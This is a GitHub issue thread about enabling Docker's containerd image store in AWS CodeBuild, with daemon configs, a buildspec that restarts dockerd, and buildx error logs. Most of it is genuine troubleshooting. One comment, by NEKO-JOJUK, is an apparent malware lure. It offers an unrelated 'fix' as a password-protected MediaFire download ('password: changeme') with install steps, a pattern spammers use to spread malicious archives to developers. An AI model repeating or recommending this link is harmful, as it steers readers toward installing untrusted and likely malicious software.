### ISSUE TITLE
Support enabling containerd image store

### ISSUE THREAD

**Issue by daniel-amag** [aws/aws-codebuild-docker-images#736]
After the update from Docker v23 to Docker v26 the default docker driver currently supports the registry cache backend but only when [containerd image store is enabled](https://docs.docker.com/build/cache/backends/). The default docker driver is a lot faster than the container driver when you need to use the --load flag. 

I've tried enabling this by creating a daemon config file with
```json
{
  "features": {
    "containerd-snapshotter": true
  }
}
```
and then instructing the daemon to use it upon restart but it doesn't seem to work.
`nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://127.0.0.1:2375 --experimental --config-file /etc/docker/daemon.json &`

This will always give this error if I try to build with the registry cache backend:

```
ERROR: Cache export is not supported for the docker driver.
--
282 | Switch to a different driver, or turn on the containerd image store, and try again.
283 | Learn more at https://docs.docker.com/go/build-cache-backends/
```

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BwL1289** [comment]
I am completely blocked by codebuild not utilizing `containerd`. Large images w/ many layers simply won't work in codebuild without it and will fail either on provisioning stage due to `max layers exceeded`, or if you're pulling a docker image inside codebuild, will also fail with `max layers exceeded`. 

This is a critical to implement.

**Comment by BwL1289** [comment]
To make matters worse, if you are using cdk pipelines, your entire build flow will not work even if one image with the above error occurs. This needs to be fixed.

**Comment by xinyu-aws** [comment]
You'll need to restart docker daemon after configuring docker daemon. 

Example buildspec. Using latest ubuntu:7.0 in privileged build.
```
version: 0.2

phases:
  install:
    commands:
      - echo "Configure Docker Daemon"
      - mkdir -p /etc/docker
      - "echo '{\n  \"features\": {\n    \"containerd-snapshotter\": true\n  }\n}' > /etc/docker/daemon.json"
      - echo "Restart Docker Daemon"
      - kill $(cat /var/run/docker.pid) && rm -rf /var/run/docker.pid
      - nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://127.0.0.1:2375 --storage-driver=overlay2 &
      - timeout 20 sh -c "until docker info; do echo .; sleep 1; done"
  build:
    commands:
      - docker info
```

docker info returns
```
 Storage Driver: overlay2
  driver-type: io.containerd.snapshotter.v1
```

**Comment by daniel-amag** [comment]
Awesome! Thanks @xinyu-aws! When I change the storage driver from overlay2 to overlayfs I'm able to get the behaviour I want which is to use ECR as a remote build cache while on the default docker driver not the container driver (so I don't have to do --load which takes ages).

`docker buildx build --cache-from type=registry,ref=$IMAGE_REPO_URI:cache --cache-to mode=max,image-manifest=true,oci-mediatypes=true,type=registry,ref=$IMAGE_REPO_URI:cache -t $IMAGE_REPO_NAME:latest .`

**Comment by BwL1289** [comment]
@xinyu-aws this does not work for me (FWIW we were restarting the daemon prior to your comment and were always able to get codebuild to use `containerd` but the error persists—see below). 

When using the docker container driver, I receive the following. To be clear the exact same code works when not specifying `containerd.

```
Name:          builder_0.17.1_aarch64_from_root
Driver:        docker-container
Last Activity: 2025-02-11 18:57:23 +0000 UTC

Nodes:
Name:                  builder_0.17.1_aarch64_from_root0
Endpoint:              unix:///var/run/docker.sock
Driver Options:        image="moby/buildkit:v0.17.1" env.BUILDKIT_STEP_LOG_MAX_SIZE="-1" env.BUILDKIT_STEP_LOG_MAX_SPEED="-1"
Status:                inactive
BuildKit daemon flags: --debug=true --oci-worker-gc=false --containerd-worker-gc=false --allow-insecure-entitlement=network.host
·[48;2;128;197;204m·[38;2;255;255;255m[EUGO][shell]·[48;2;41;31;102m[INFO] BuildKit builder 'builder_0.17.1_aarch64_from_root' already exists, so we reuse it.
·[48;2;128;197;204m·[38;2;255;255;255m[EUGO][shell]·[48;2;41;31;102m[INFO] Building...
#0 building with "ebuilder_0.17.1_aarch64_from_root" instance using docker-container driver

#1 [internal] booting buildkit
#1 pulling image moby/buildkit:v0.17.1
#1 pulling image moby/buildkit:v0.17.1 0.3s done
#1 creating container buildx_buildkit_builder_0.17.1_aarch64_from_root0 done
#1 ERROR: Error response from daemon: No such image: moby/buildkit:v0.17.1
------
 > [internal] booting buildkit:
------
ERROR: Error response from daemon: No such image: moby/buildkit:v0.17.1
CICDPipelineEDStackDev: fail: buildx.sh build --build-arg UMBRELLA_IMAGE_TAG=<redacted>.dkr.ecr.<redacted>.amazonaws.com/umbrella:<redacted> --tag cdkasset-<redacted> --file Dockerfile.codebuild --platform linux/arm64 . exited with error code 1: #0 building with "builder_0.17.1_aarch64_from_root" instance using docker-container driver

#1 [internal] booting buildkit
#1 pulling image moby/buildkit:v0.17.1
#1 pulling image moby/buildkit:v0.17.1 0.3s done
#1 creating container buildx_buildkit_builder_0.17.1_aarch64_from_root0 done
#1 ERROR: Error response from daemon: No such image: moby/buildkit:v0.17.1
------
 > [internal] booting buildkit:
------
ERROR: Error response from daemon: No such image: moby/buildkit:v0.17.1
```

What's most noteworthy here is `Status: inactive` which indicates that the builder instance failed to start properly.

Again, with the exact same code but without `containerd` I receive:

```
Name:          builder_0.17.1_aarch64_from_root
Driver:        docker-container
Last Activity: 2025-02-10 22:04:25 +0000 UTC

Nodes:
Name:                  builder_0.17.1_aarch64_from_root0
Endpoint:              unix:///var/run/docker.sock
Driver Options:        env.BUILDKIT_STEP_LOG_MAX_SIZE="-1" env.BUILDKIT_STEP_LOG_MAX_SPEED="-1" image="moby/buildkit:v0.17.1"
Status:                running
BuildKit daemon flags: --debug=true --oci-worker-gc=false --containerd-worker-gc=false --allow-insecure-entitlement=network.host
BuildKit version:      v0.17.1
Platforms:             linux/arm64, linux/arm/v7, linux/arm/v6
Labels:
 org.mobyproject.buildkit.worker.executor:         oci
 org.mobyproject.buildkit.worker.hostname:         7c2f9896b1fb
 org.mobyproject.buildkit.worker.network:          host
 org.mobyproject.buildkit.worker.oci.process-mode: sandbox
 org.mobyproject.buildkit.worker.selinux.enabled:  false
 org.mobyproject.buildkit.worker.snapshotter:      overlayfs
·[48;2;128;197;204m·[38;2;255;255;255m[EUGO][shell]·[48;2;41;31;102m[INFO] BuildKit builder 'builder_0.17.1_aarch64_from_root' already exists, so we reuse it.
·[48;2;128;197;204m·[38;2;255;255;255m[EUGO][shell]·[48;2;41;31;102m[INFO] Building...
#0 building with "builder_0.17.1_aarch64_from_root" instance using docker-container driver
```
